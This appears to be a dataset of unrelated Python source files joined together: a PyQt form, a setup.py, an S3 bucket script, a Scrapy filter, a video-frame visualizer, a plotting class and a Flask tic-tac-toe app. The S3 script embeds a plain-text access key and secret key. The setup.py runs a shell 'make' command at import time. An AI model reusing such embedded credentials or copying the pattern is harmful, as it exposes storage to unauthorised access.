#-*- coding: utf-8 -*-
import datetime
from PyQt4 import QtGui
from campos import CampoNum, CampoCad
from controllers.orden_controller import initData, translateView, updateData, checkValidacion, Save
class OrdenView(QtGui.QGroupBox):
def __init__(self, parent=None):
super(OrdenView, self).__init__(parent)
self.label_numero = QtGui.QLabel(self)
self.text_numero = CampoNum(self, u"Número de orden")
self.label_fecha = QtGui.QLabel(self)
self.date_fecha = QtGui.QDateEdit(self)
self.label_bien_servicio = QtGui.QLabel(self)
self.text_bien_servicio = CampoNum(self, u"Bien/servicio")
self.label_rubro = QtGui.QLabel(self)
self.text_rubro = CampoCad(self, u"Rubro")
self.fila_orden = QtGui.QHBoxLayout()
self.fila_orden.addWidget(self.label_numero)
self.fila_orden.addWidget(self.text_numero)
self.fila_orden.addWidget(self.label_fecha)
self.fila_orden.addWidget(self.date_fecha)
self.fila_orden.addWidget(self.label_bien_servicio)
self.fila_orden.addWidget(self.text_bien_servicio)
self.fila_orden.addWidget(self.label_rubro)
self.fila_orden.addWidget(self.text_rubro)
self.setLayout(self.fila_orden)
self.translate_view()
init_data = initData
translate_view = translateView
update_data = updateData
check_validacion = checkValidacion
save = Save | python |
#!/usr/bin/env python3
from distutils.core import setup
import os
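# Build step: invoke make up front so any compiled artifacts exist before
# setup() runs (note this executes at import time).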
os.system("make ")
setup(name='pi',
version='1.0',
description='pi digits compute',
author='mathm',
author_email='[email protected]',
url="https://igit.58corp.com/mingtinglai/pi",
)
| python |
import os
import sys
import threading
import boto3
import logging
import shutil
from botocore.client import Config
from matplotlib import pyplot as plt
from botocore.exceptions import ClientError
from boto3.s3.transfer import TransferConfig
END_POINT_URL = 'http://uvo1baooraa1xb575uc.vm.cld.sr/'
A_KEY = 'AKIAtEpiGWUcQIelPRlD1Pi6xQ'
S_KEY = 'YNV6xS8lXnCTGSy1x2vGkmGnmdJbZSapNXaSaRhK'
class ProgressPercentage(object):
def __init__(self, filename):
self._filename = filename
self._size = float(os.path.getsize(filename))
self._seen_so_far = 0
self._lock = threading.Lock()
def __call__(self, bytes_amount):
# To simplify, assume this is hooked up to a single filename
with self._lock:
self._seen_so_far += bytes_amount
percentage = (self._seen_so_far / self._size) * 100
sys.stdout.write("\r%s %s / %s (%.2f%%)" %
(self._filename, self._seen_so_far,
self._size, percentage))
sys.stdout.flush()
"""Functions for buckets operation"""
def create_bucket_op(bucket_name, region):
if region is None:
s3_client.create_bucket(Bucket=bucket_name)
else:
location = {'LocationConstraint': region}
s3_client.create_bucket(Bucket=bucket_name,
CreateBucketConfiguration=location)
def list_bucket_op(bucket_name, region, operation):
buckets = s3_client.list_buckets()
if buckets['Buckets']:
for bucket in buckets['Buckets']:
print(bucket)
return True
else:
        logging.error('no buckets found')
return False
def bucket_operation(bucket_name, region=None, operation='list'):
try:
if operation == 'delete':
s3_client.delete_bucket(Bucket=bucket_name)
elif operation == 'create':
create_bucket_op(bucket_name, region)
elif operation == 'list':
return list_bucket_op(bucket_name, region, operation)
else:
logging.error('unknown bucket operation')
return False
except ClientError as e:
logging.error(e)
return False
return True
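# Example (illustrative bucket name):
#   bucket_operation('my-bucket', operation='create')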
def upload_download_op_file(bucket_name, file_name, file_location,
region, operation):
if not file_location:
        logging.error('The file location is missing for %s operation!'
                      % operation)
return False
    if operation == 'download':
        s3_resource.Bucket(bucket_name).download_file(file_name, file_location)
    else:
        # 'upload': a LocationConstraint applies when creating a bucket, not to
        # per-object uploads, so the region argument is not passed here
        s3_resource.Bucket(bucket_name).upload_file(file_location, file_name)
return True
"""Functions for files operation"""
def list_op_file(bucket_name):
current_bucket = s3_resource.Bucket(bucket_name)
print('The files in bucket %s:\n' % (bucket_name))
for obj in current_bucket.objects.all():
print(obj.meta.data)
return True
def delete_op_file(bucket_name, file_name, operation):
if not file_name:
        logging.error('The file name is missing for %s operation!'
                      % operation)
return False
s3_client.delete_object(Bucket=bucket_name, Key=file_name)
return True
def file_operation(bucket_name=None, file_name=None, file_location=None,
region=None, operation='list'):
if not bucket_name:
        logging.error('The bucket name is missing!')
return False
try:
if operation == 'list':
return list_op_file(bucket_name)
elif operation == 'delete':
return delete_op_file(bucket_name, file_name, operation)
elif operation == 'upload' or operation == 'download':
return upload_download_op_file(bucket_name, file_name,
file_location, region, operation)
else:
logging.error('unknown file operation')
return False
except ClientError as e:
logging.error(e)
return False
return True
s3_resource = boto3.resource('s3', endpoint_url=END_POINT_URL,
aws_access_key_id=A_KEY,
aws_secret_access_key=S_KEY,
config=Config(signature_version='s3v4'),
region_name='US')
s3_client = boto3.client('s3', endpoint_url=END_POINT_URL,
aws_access_key_id=A_KEY,
aws_secret_access_key=S_KEY,
config=Config(signature_version='s3v4'),
region_name='US')
bucket_name = 'detection'
file_name = r'0_5.txt'
# path_file_upload = r'C:\PycharmProjects\cortxHackton\upload\0_5.txt'
# assert os.path.isfile(path_file_upload)
# with open(path_file_upload, "r") as f:
# pass
path_file_download = r'download\0_5.txt'
path_save = ''
if bucket_operation(bucket_name, None, 'list'):
print("Bucket creation completed successfully!")
#
# if file_operation(bucket_name, file_name, path_file_upload, None, 'upload'):
# print("Uploading file to S3 completed successfully!")
if file_operation(bucket_name, file_name, path_file_download, None, 'download'):
print("Downloading the file to S3 has been completed successfully!")
# if file_operation(bucket_name, file_name, path_file_download, None, 'delete'):
# print("Downloading the file to S3 has been completed successfully!")
# zip_point = ''
# shutil.make_archive(zip_point, 'zip', path_save)
# if file_operation(bucket_name, '.json', path_save + '.json', None, 'upload'):
# print("Uploading file to S3 completed successfully!")
| python |
#coding:utf-8
import hashlib
from scrapy.dupefilters import RFPDupeFilter
from scrapy.utils.url import canonicalize_url
class URLSha1Filter(RFPDupeFilter):
"""根据urlsha1过滤"""
def __init__(self, path=None, debug=False):
self.urls_seen = set()
RFPDupeFilter.__init__(self, path)
def request_seen(self, request):
fp = hashlib.sha1()
fp.update(canonicalize_url(request.url))
url_sha1 = fp.hexdigest()
if url_sha1 in self.urls_seen:
return True
else:
self.urls_seen.add(url_sha1) | python |
from sys import *
sid = 11 if len(argv) <= 1 else int(argv[1])
from random import *
seed(sid)
for cas in range(int(input())):
input()
m = {}
for i, v in enumerate(map(int, input().split())): m.setdefault(v, []).append(i)
b = [v for i, v in sorted((choice(l), v) for v, l in m.items())]
print(len(b))
print(*b)
| python |
#
# Project FrameVis - Video Frame Visualizer Script
# @author David Madison
# @link github.com/dmadison/FrameVis
# @version v1.0.1
# @license MIT - Copyright (c) 2019 David Madison
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import cv2
import numpy as np
import argparse
from enum import Enum, auto
import time
class FrameVis:
"""
Reads a video file and outputs an image comprised of n resized frames, spread evenly throughout the file.
"""
default_frame_height = None # auto, or in pixels
default_frame_width = None # auto, or in pixels
default_concat_size = 1 # size of concatenated frame if automatically calculated, in pixels
default_direction = "horizontal" # left to right
def visualize(self, source, nframes, height=default_frame_height, width=default_frame_width, \
direction=default_direction, trim=False, quiet=True):
"""
Reads a video file and outputs an image comprised of n resized frames, spread evenly throughout the file.
Parameters:
source (str): filepath to source video file
nframes (int): number of frames to process from the video
height (int): height of each frame, in pixels
width (int): width of each frame, in pixels
            direction (str): direction to concatenate frames ("horizontal" or "vertical")
            trim (bool): detect and crop any hard matting (letterboxing or pillarboxing)
            quiet (bool): suppress console messages
Returns:
visualization image as numpy array
"""
video = cv2.VideoCapture(source) # open video file
if not video.isOpened():
raise FileNotFoundError("Source Video Not Found")
if not quiet:
print("") # create space from script call line
# calculate keyframe interval
video_total_frames = video.get(cv2.CAP_PROP_FRAME_COUNT) # retrieve total frame count from metadata
if not isinstance(nframes, int) or nframes < 1:
raise ValueError("Number of frames must be a positive integer")
elif nframes > video_total_frames:
raise ValueError("Requested frame count larger than total available ({})".format(video_total_frames))
keyframe_interval = video_total_frames / nframes # calculate number of frames between captures
# grab frame for dimension calculations
success,image = video.read() # get first frame
if not success:
raise IOError("Cannot read from video file")
# calculate letterbox / pillarbox trimming, if specified
matte_type = 0
        if trim:
if not quiet:
print("Trimming enabled, checking matting... ", end="", flush=True)
# 10 frame samples, seen as matted if an axis has all color channels at 3 / 255 or lower (avg)
success, cropping_bounds = MatteTrimmer.determine_video_bounds(source, 10, 3)
matte_type = 0
if success: # only calculate cropping if bounds are valid
crop_width = cropping_bounds[1][0] - cropping_bounds[0][0] + 1
crop_height = cropping_bounds[1][1] - cropping_bounds[0][1] + 1
if crop_height != image.shape[0]: # letterboxing
matte_type += 1
                if crop_width != image.shape[1]:  # pillarboxing
                    matte_type += 2
if not quiet:
if matte_type == 0:
print("no matting detected")
elif matte_type == 1:
print("letterboxing detected, cropping {} px from the top and bottom".format(int((image.shape[0] - crop_height) / 2)))
elif matte_type == 2:
print("pillarboxing detected, trimming {} px from the sides".format(int((image.shape[1] - crop_width) / 2)))
elif matte_type == 3:
print("multiple matting detected - cropping ({}, {}) to ({}, {})".format(image.shape[1], image.shape[0], crop_width, crop_height))
# calculate height
if height is None: # auto-calculate
if direction == "horizontal": # non-concat, use video size
if matte_type & 1 == 1: # letterboxing present
height = crop_height
else:
height = image.shape[0] # save frame height
else: # concat, use default value
height = FrameVis.default_concat_size
elif not isinstance(height, int) or height < 1:
raise ValueError("Frame height must be a positive integer")
# calculate width
if width is None: # auto-calculate
if direction == "vertical": # non-concat, use video size
if matte_type & 2 == 2: # pillarboxing present
width = crop_width
else:
width = image.shape[1] # save frame width
else: # concat, use default value
width = FrameVis.default_concat_size
elif not isinstance(width, int) or width < 1:
raise ValueError("Frame width must be a positive integer")
# assign direction function and calculate output size
if direction == "horizontal":
concatenate = cv2.hconcat
output_width = width * nframes
output_height = height
elif direction == "vertical":
concatenate = cv2.vconcat
output_width = width
output_height = height * nframes
else:
raise ValueError("Invalid direction specified")
if not quiet:
aspect_ratio = output_width / output_height
print("Visualizing \"{}\" - {} by {} ({:.2f}), from {} frames (every {:.2f} seconds)"\
.format(source, output_width, output_height, aspect_ratio, nframes, FrameVis.interval_from_nframes(source, nframes)))
# set up for the frame processing loop
next_keyframe = keyframe_interval / 2 # frame number for the next frame grab, starting evenly offset from start/end
finished_frames = 0 # counter for number of processed frames
output_image = None
progress = ProgressBar("Processing:")
while True:
if finished_frames == nframes:
break # done!
video.set(cv2.CAP_PROP_POS_FRAMES, int(next_keyframe)) # move cursor to next sampled frame
success,image = video.read() # read the next frame
if not success:
raise IOError("Cannot read from video file (frame {} out of {})".format(int(next_keyframe), video_total_frames))
if matte_type != 0: # crop out matting, if specified and matting is present
image = MatteTrimmer.crop_image(image, cropping_bounds)
image = cv2.resize(image, (width, height)) # resize to output size
# save to output image
if output_image is None:
output_image = image
else:
                output_image = concatenate([output_image, image])  # append frame along the chosen axis
finished_frames += 1
next_keyframe += keyframe_interval # set next frame capture time, maintaining floats
if not quiet:
progress.write(finished_frames / nframes) # print progress bar to the console
video.release() # close video capture
return output_image
@staticmethod
def average_image(image, direction):
"""
Averages the colors in an axis across an entire image
Parameters:
image (arr x.y.c): image as 3-dimensional numpy array
direction (str): direction to average frames ("horizontal" or "vertical")
Returns:
image, with pixel data averaged along provided axis
"""
height, width, depth = image.shape
if direction == "horizontal":
scale_height = 1
scale_width = width
elif direction == "vertical":
scale_height = height
scale_width = 1
else:
raise ValueError("Invalid direction specified")
image = cv2.resize(image, (scale_width, scale_height)) # scale down to '1', averaging values
image = cv2.resize(image, (width, height)) # scale back up to size
return image
@staticmethod
def motion_blur(image, direction, blur_amount):
"""
Blurs the pixels in a given axis across an entire image.
Parameters:
image (arr x.y.c): image as 3-dimensional numpy array
direction (str): direction of stacked images for blurring ("horizontal" or "vertical")
blur_amount (int): how much to blur the image, as the convolution kernel size
Returns:
image, with pixel data blurred along provided axis
"""
kernel = np.zeros((blur_amount, blur_amount)) # create convolution kernel
# fill group with '1's
if direction == "horizontal":
kernel[:, int((blur_amount - 1)/2)] = np.ones(blur_amount) # fill center column (blurring vertically for horizontal concat)
elif direction == "vertical":
kernel[int((blur_amount - 1)/2), :] = np.ones(blur_amount) # fill center row (blurring horizontally for vertical concat)
else:
raise ValueError("Invalid direction specified")
kernel /= blur_amount # normalize kernel matrix
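        # Example: blur_amount=3 with direction="horizontal" yields
        #   [[0, 1/3, 0],
        #    [0, 1/3, 0],
        #    [0, 1/3, 0]]
        # so each output pixel averages three vertically adjacent pixels.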
return cv2.filter2D(image, -1, kernel) # filter using kernel with same depth as source
@staticmethod
def nframes_from_interval(source, interval):
"""
Calculates the number of frames available in a video file for a given capture interval
Parameters:
source (str): filepath to source video file
interval (float): capture frame every i seconds
Returns:
number of frames per time interval (int)
"""
video = cv2.VideoCapture(source) # open video file
if not video.isOpened():
raise FileNotFoundError("Source Video Not Found")
frame_count = video.get(cv2.CAP_PROP_FRAME_COUNT) # total number of frames
fps = video.get(cv2.CAP_PROP_FPS) # framerate of the video
duration = frame_count / fps # duration of the video, in seconds
video.release() # close video capture
return int(round(duration / interval)) # number of frames per interval
@staticmethod
def interval_from_nframes(source, nframes):
"""
Calculates the capture interval, in seconds, for a video file given the
number of frames to capture
Parameters:
source (str): filepath to source video file
nframes (int): number of frames to capture from the video file
Returns:
time interval (seconds) between frame captures (float)
"""
video = cv2.VideoCapture(source) # open video file
if not video.isOpened():
raise FileNotFoundError("Source Video Not Found")
frame_count = video.get(cv2.CAP_PROP_FRAME_COUNT) # total number of frames
fps = video.get(cv2.CAP_PROP_FPS) # framerate of the video
keyframe_interval = frame_count / nframes # calculate number of frames between captures
video.release() # close video capture
return keyframe_interval / fps # seconds between captures
class MatteTrimmer:
"""
Functions for finding and removing black mattes around video frames
"""
@staticmethod
def find_matrix_edges(matrix, threshold):
"""
Finds the start and end points of a 1D array above a given threshold
Parameters:
matrix (arr, 1.x): 1D array of data to check
threshold (value): valid data is above this trigger level
Returns:
tuple with the array indices of data bounds, start and end
"""
if not isinstance(matrix, (list, tuple, np.ndarray)) or len(matrix.shape) != 1:
raise ValueError("Provided matrix is not the right size (must be 1D)")
data_start = None
data_end = None
for value_id, value in enumerate(matrix):
if value > threshold:
if data_start is None:
data_start = value_id
data_end = value_id
return (data_start, data_end)
@staticmethod
def find_larger_bound(first, second):
"""
Takes two sets of diagonal rectangular boundary coordinates and determines
the set of rectangular boundary coordinates that contains both
Parameters:
first (arr, 1.2.2): pair of rectangular coordinates, in the form [(X,Y), (X,Y)]
second (arr, 1.2.2): pair of rectangular coordinates, in the form [(X,Y), (X,Y)]
Where for both arrays the first coordinate is in the top left-hand corner,
and the second coordinate is in the bottom right-hand corner.
Returns:
numpy coordinate matrix containing both of the provided boundaries
"""
left_edge = first[0][0] if first[0][0] <= second[0][0] else second[0][0]
right_edge = first[1][0] if first[1][0] >= second[1][0] else second[1][0]
top_edge = first[0][1] if first[0][1] <= second[0][1] else second[0][1]
bottom_edge = first[1][1] if first[1][1] >= second[1][1] else second[1][1]
return np.array([[left_edge, top_edge], [right_edge, bottom_edge]])
@staticmethod
def valid_bounds(bounds):
"""
Checks if the frame bounds are a valid format
Parameters:
bounds (arr, 1.2.2): pair of rectangular coordinates, in the form [(X,Y), (X,Y)]
Returns:
True or False
"""
        for x, x_coordinate in enumerate(bounds):
            for y, y_coordinate in enumerate(x_coordinate):
                if y_coordinate is None:
                    return False  # missing coordinate
if bounds[0][0] > bounds[1][0] or \
bounds[0][1] > bounds[1][1]:
return False # left > right or top > bottom
return True
@staticmethod
def determine_image_bounds(image, threshold):
"""
Determines if there are any hard mattes (black bars) surrounding
an image on either the top (letterboxing) or the sides (pillarboxing)
Parameters:
image (arr, x.y.c): image as 3-dimensional numpy array
threshold (8-bit int): min color channel value to judge as 'image present'
Returns:
success (bool): True or False if the bounds are valid
image_bounds: numpy coordinate matrix with the two opposite corners of the
image bounds, in the form [(X,Y), (X,Y)]
"""
height, width, depth = image.shape
# check for letterboxing
horizontal_sums = np.sum(image, axis=(1,2)) # sum all color channels across all rows
hthreshold = (threshold * width * depth) # must be below every pixel having a value of "threshold" in every channel
vertical_edges = MatteTrimmer.find_matrix_edges(horizontal_sums, hthreshold)
# check for pillarboxing
vertical_sums = np.sum(image, axis=(0,2)) # sum all color channels across all columns
vthreshold = (threshold * height * depth) # must be below every pixel having a value of "threshold" in every channel
horizontal_edges = MatteTrimmer.find_matrix_edges(vertical_sums, vthreshold)
image_bounds = np.array([[horizontal_edges[0], vertical_edges[0]], [horizontal_edges[1], vertical_edges[1]]])
return MatteTrimmer.valid_bounds(image_bounds), image_bounds
@staticmethod
def determine_video_bounds(source, nsamples, threshold):
"""
Determines if any matting exists in a video source
Parameters:
source (str): filepath to source video file
nsamples (int): number of frames from the video to determine bounds,
evenly spaced throughout the video
threshold (8-bit int): min color channel value to judge as 'image present'
Returns:
success (bool): True or False if the bounds are valid
video_bounds: numpy coordinate matrix with the two opposite corners of the
video bounds, in the form [(X,Y), (X,Y)]
"""
video = cv2.VideoCapture(source) # open video file
if not video.isOpened():
raise FileNotFoundError("Source Video Not Found")
video_total_frames = video.get(cv2.CAP_PROP_FRAME_COUNT) # retrieve total frame count from metadata
if not isinstance(nsamples, int) or nsamples < 1:
raise ValueError("Number of samples must be a positive integer")
keyframe_interval = video_total_frames / nsamples # calculate number of frames between captures
# open video to make results consistent with visualizer
# (this also GREATLY increases the read speed? no idea why)
success,image = video.read() # get first frame
if not success:
raise IOError("Cannot read from video file")
next_keyframe = keyframe_interval / 2 # frame number for the next frame grab, starting evenly offset from start/end
video_bounds = None
for frame_number in range(nsamples):
video.set(cv2.CAP_PROP_POS_FRAMES, int(next_keyframe)) # move cursor to next sampled frame
success,image = video.read() # read the next frame
if not success:
raise IOError("Cannot read from video file")
success, frame_bounds = MatteTrimmer.determine_image_bounds(image, threshold)
if not success:
continue # don't compare bounds, frame bounds are invalid
video_bounds = frame_bounds if video_bounds is None else MatteTrimmer.find_larger_bound(video_bounds, frame_bounds)
next_keyframe += keyframe_interval # set next frame capture time, maintaining floats
video.release() # close video capture
return MatteTrimmer.valid_bounds(video_bounds), video_bounds
@staticmethod
def crop_image(image, bounds):
"""
Crops a provided image by the coordinate bounds pair provided.
Parameters:
image (arr, x.y.c): image as 3-dimensional numpy array
            bounds (arr, 1.2.2): pair of rectangular coordinates, in the form [(X,Y), (X,Y)]
Returns:
image as 3-dimensional numpy array, cropped to the coordinate bounds
"""
return image[bounds[0][1]:bounds[1][1], bounds[0][0]:bounds[1][0]]
class ProgressBar:
"""
Generates a progress bar for the console output
Args:
pre (str): string to prepend before the progress bar
bar_length (int): length of the progress bar itself, in characters
print_elapsed (bool): option to print time elapsed or not
Attributes:
        pre (str): string to prepend before the progress bar
        bar_length (int): length of the progress bar itself, in characters
        print_elapsed (bool): option to print time elapsed or not
"""
def __init__(self, pre="", bar_length=25, print_elapsed=True):
pre = (pre + '\t') if pre != "" else pre # append separator if string present
self.pre = pre
self.bar_length = bar_length
self.print_elapsed = print_elapsed
if self.print_elapsed:
self.__start_time = time.time() # store start time as unix
def write(self, percent):
"""Prints a progress bar to the console based on the input percentage (float)."""
term_char = '\r' if percent < 1.0 else '\n' # rewrite the line unless finished
filled_size = int(round(self.bar_length * percent)) # number of 'filled' characters in the bar
progress_bar = "#" * filled_size + " " * (self.bar_length - filled_size) # progress bar characters, as a string
time_string = ""
if self.print_elapsed:
time_elapsed = time.time() - self.__start_time
time_string = "\tTime Elapsed: {}".format(time.strftime("%H:%M:%S", time.gmtime(time_elapsed)))
print("{}[{}]\t{:.2%}{}".format(self.pre, progress_bar, percent, time_string), end=term_char, flush=True)
def main():
parser = argparse.ArgumentParser(description="video frame visualizer and movie barcode generator", add_help=False) # removing help so I can use '-h' for height
parser.add_argument("source", help="file path for the video file to be visualized", type=str)
parser.add_argument("destination", help="file path output for the final image", type=str)
parser.add_argument("-n", "--nframes", help="the number of frames in the visualization", type=int)
parser.add_argument("-i", "--interval", help="interval between frames for the visualization", type=float)
parser.add_argument("-h", "--height", help="the height of each frame, in pixels", type=int, default=FrameVis.default_frame_height)
parser.add_argument("-w", "--width", help="the output width of each frame, in pixels", type=int, default=FrameVis.default_frame_width)
parser.add_argument("-d", "--direction", help="direction to concatenate frames, horizontal or vertical", type=str, \
choices=["horizontal", "vertical"], default=FrameVis.default_direction)
parser.add_argument("-t", "--trim", help="detect and trim any hard matting (letterboxing or pillarboxing)", action='store_true', default=False)
parser.add_argument("-a", "--average", help="average colors for each frame", action='store_true', default=False)
parser.add_argument("-b", "--blur", help="apply motion blur to the frames (kernel size)", type=int, nargs='?', const=100, default=0)
parser.add_argument("-q", "--quiet", help="mute console outputs", action='store_true', default=False)
parser.add_argument("--help", action="help", help="show this help message and exit")
args = parser.parse_args()
# check number of frames arguments
if args.nframes is None:
if args.interval is not None: # calculate nframes from interval
args.nframes = FrameVis.nframes_from_interval(args.source, args.interval)
else:
parser.error("You must provide either an --(n)frames or --(i)nterval argument")
# check postprocessing arguments
if args.average is True and args.blur != 0:
parser.error("Cannot (a)verage and (b)lur, you must choose one or the other")
fv = FrameVis()
output_image = fv.visualize(args.source, args.nframes, height=args.height, width=args.width, \
direction=args.direction, trim=args.trim, quiet=args.quiet)
# postprocess
if args.average or args.blur != 0:
if args.average:
if not args.quiet:
print("Averaging frame colors... ", end="", flush=True)
output_image = fv.average_image(output_image, args.direction)
if args.blur != 0:
if not args.quiet:
print("Adding motion blur to final frame... ", end="", flush=True)
output_image = fv.motion_blur(output_image, args.direction, args.blur)
if not args.quiet:
print("done")
cv2.imwrite(args.destination, output_image) # save visualization to file
if not args.quiet:
print("Visualization saved to {}".format(args.destination))
if __name__ == "__main__":
main()
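# Example invocation (file names are illustrative):
#   python framevis.py input.mp4 barcode.png --nframes 1600 --direction vertical --blur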
| python |
import os
import pickle
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from task_dyva.utils import save_figure
from task_dyva.visualization import PlotModelLatents
class FigureS6():
"""Analysis methods and plotting routines to reproduce
Figure S6 from the manuscript (example latent state trajectories).
"""
analysis_dir = 'model_analysis'
stats_fn = 'holdout_outputs_01SD.pkl'
fp_fn = 'fixed_points.pkl'
age_bins = ['ages20to29', 'ages30to39', 'ages40to49',
'ages50to59', 'ages60to69', 'ages70to79', 'ages80to89']
plot_age_bins = ['ages20to29', 'ages50to59', 'ages80to89']
plot_titles = ['Ages 20 to 29', 'Ages 50 to 59', 'Ages 80 to 89']
figsize = (9, 13)
figdpi = 300
def __init__(self, model_dir, save_dir, metadata):
self.model_dir = model_dir
self.save_dir = save_dir
self.expts = metadata['name']
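        # Note: the assignment below shadows the class-level age_bins default.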
self.age_bins = metadata['age_range']
self.sc_status = metadata['switch_cost_type']
# Containers for summary stats
self.all_stats = {ab: [] for ab in self.age_bins}
self.all_fps = {ab: [] for ab in self.age_bins}
def make_figure(self):
print('Making Figure S6...')
self._run_preprocessing()
fig = self._plot_figure()
save_figure(fig, self.save_dir, 'FigS6')
print('')
def _run_preprocessing(self):
for expt_str, ab, sc in zip(self.expts,
self.age_bins,
self.sc_status):
# Skip sc- models
if sc == 'sc-':
continue
# Load stats from the holdout data
stats_path = os.path.join(self.model_dir, expt_str,
self.analysis_dir, self.stats_fn)
with open(stats_path, 'rb') as path:
expt_stats = pickle.load(path)
# Load fixed points
fp_path = os.path.join(self.model_dir, expt_str,
self.analysis_dir, self.fp_fn)
with open(fp_path, 'rb') as path:
fps = pickle.load(path)
self.all_stats[ab].append(expt_stats)
self.all_fps[ab].append(fps)
def _plot_figure(self):
fig = plt.figure(figsize=self.figsize, dpi=self.figdpi)
nrows = 5
t_post = 1200
elev, azim = 30, 60
for ab_ind, ab in enumerate(self.plot_age_bins):
this_stats = self.all_stats[ab]
this_fps = self.all_fps[ab]
this_means = np.array([s.summary_stats['u_mean_rt']
for s in this_stats])
sort_inds = np.argsort(this_means)
plot_inds = np.arange(0, len(sort_inds), 20 // nrows)
for ax_ind, p in enumerate(plot_inds):
subplot_ind = ax_ind * 3 + ab_ind + 1
ax = fig.add_subplot(nrows, 3, subplot_ind, projection='3d')
plot_stats = this_stats[sort_inds[p]]
plot_fps = this_fps[sort_inds[p]]
# Plot
if ax_ind == 0 and ab_ind == 0:
kwargs = {'annotate': True}
else:
kwargs = {'annotate': False}
plotter = PlotModelLatents(plot_stats, post_on_dur=t_post,
fixed_points=plot_fps, plot_pre_onset=False)
ax = plotter.plot_main_conditions(ax, elev=elev, azim=azim,
**kwargs)
if ax_ind == 0:
ax.set_title(self.plot_titles[ab_ind])
return fig
| python |
import random
from flask import render_template, redirect, flash, url_for, request, jsonify
from flask_login import login_user, logout_user, current_user, login_required
from sqlalchemy import desc
from app import app, db, login_manager, forms
from app.models import User, Game, GameMove
from app.decorators import not_in_game
@app.route("/")
@login_required
@not_in_game
def index():
games_in_wait = Game.query.filter_by(state=Game.game_state['waiting_for_players']).limit(5)
games_in_progress = Game.query.filter_by(state=Game.game_state['in_progress']).limit(5)
return render_template('index.html', games_in_progress=games_in_progress, games_in_wait=games_in_wait)
@app.route("/login", methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('index'))
if request.method == 'POST':
form = forms.LoginForm(request.form)
else:
form = forms.LoginForm()
if form.validate_on_submit():
user = User.get_authenticated_user(form.username.data, form.password.data)
if user:
login_user(user)
return redirect(url_for('index'))
    flash('Cannot find this combination of username and password')
return render_template('login.html', login_form=form)
@app.route("/logout", methods=['POST'])
def logout():
logout_user()
return redirect(url_for('index'))
@app.route("/register", methods=['GET', 'POST'])
def register():
if request.method == 'POST':
form = forms.RegisterForm(request.form)
else:
form = forms.RegisterForm()
if form.validate_on_submit():
user = User(form.username.data, form.password.data, form.email.data)
db.session.add(user)
db.session.commit()
login_user(user)
# Redirect to homepage, if user is successfully authenticated
if current_user.is_authenticated:
flash('Welcome to the Tic-Tac-Toe!', 'success')
return redirect(url_for('index'))
return render_template('register.html', register_form=form)
@app.route("/game/new", methods=['GET', 'POST'])
@login_required
@not_in_game
def new_game():
if request.method == 'POST':
form = forms.NewGameForm(request.form)
else:
form = forms.NewGameForm()
if form.validate_on_submit():
# generate random players order in game
user_order = random.choice([1, 2])
if user_order == 1:
game = Game(field_size=form.size.data, win_length=form.rule.data, player1=current_user)
else:
game = Game(field_size=form.size.data, win_length=form.rule.data, player2=current_user)
db.session.add(game)
db.session.commit()
return redirect(url_for('show_game', game_id=game.id))
return render_template('new_game.html', new_game_form=form)
@app.route("/game/join/<int:game_id>", methods=['POST'])
@login_required
def join_game(game_id):
game = Game.query.get_or_404(game_id)
    if game.player1_id and game.player2_id:
# redirect back to the game if it's full
flash('Current game is already in progress')
return redirect(url_for('show_game', game_id=game_id))
# check available player position in game
if game.player1_id is None:
game.player1 = current_user
else:
game.player2 = current_user
game.state = Game.game_state['in_progress']
db.session.commit()
return redirect(url_for('show_game', game_id=game_id))
@app.route("/game/flee", methods=['POST'])
@login_required
def flee_game():
game = current_user.current_game
# if there is no game to flee, redirect to homepage
if not game:
flash('There is no game to flee')
return redirect(url_for('index'))
game.state = Game.game_state['finished']
if game.player1_id == current_user.id:
opponent = game.player2
result = Game.game_result['player_two_win']
else:
opponent = game.player1
result = Game.game_result['player_one_win']
# if there was a second player in a game, let him win
if opponent:
game.result = result
db.session.commit()
return redirect(url_for('index'))
@app.route("/game/<int:game_id>", methods=['GET'])
@login_required
@not_in_game
def show_game(game_id):
game = Game.query.get_or_404(game_id)
if game.player1_id == current_user.id:
player_number = 1
elif game.player2_id == current_user.id:
player_number = 2
else:
# Spectator
player_number = current_user.id + 100 # simple unique spectator id
return render_template('game.html', game=game, player_number=player_number)
@app.route("/profile/<int:user_id>", methods=['GET'])
@login_required
@not_in_game
def user_profile(user_id):
last_games_limit = 25
finished = Game.game_state['finished']
user = User.get_user_by_id(user_id)
games = user.games.filter(Game.state == finished)\
        .filter(Game.player1_id.isnot(None))\
        .filter(Game.player2_id.isnot(None))\
.order_by(desc(Game.id)).limit(last_games_limit)
return render_template('profile.html', games=games, user=user)
@app.route("/gamearchive/<int:game_id>", methods=['GET'])
@login_required
@not_in_game
def show_archived_game(game_id):
game = Game.query.get_or_404(game_id)
player_number = current_user.id + 100 # unique spectator id
template = 'archive_game.html'
if game.state != Game.game_state['finished']:
template = 'game.html'
return render_template(template, game=game, player_number=player_number)
@app.route("/game/<int:game_id>/json", methods=['GET'])
def get_game_data(game_id):
game = Game.query.get_or_404(game_id)
players = []
for index, player_name in enumerate((game.player1.username, game.player2.username)):
player = {
'name': player_name,
'player_number': index + 1
}
players.append(player)
moves = list(map(GameMove.dic, game.moves))
return jsonify(moves=moves, players=players)
@login_manager.user_loader
def load_user(userid):
return User.get_user_by_id(userid)
| python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 15 15:49:57 2018
@author: pranavjain
This model predicts the quality of red wine. An optimal model is also built using Backward Elimination.
Required Data to predict
Fixed acidity
